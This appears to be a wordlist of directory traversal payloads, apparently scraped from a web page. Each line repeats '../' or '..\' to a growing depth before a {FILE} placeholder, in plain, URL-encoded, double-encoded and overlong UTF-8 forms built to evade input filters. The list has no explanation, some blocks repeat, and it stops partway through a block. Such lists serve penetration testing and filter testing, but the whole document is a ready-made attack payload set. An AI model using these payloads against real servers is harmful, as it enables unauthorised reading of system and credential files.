%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
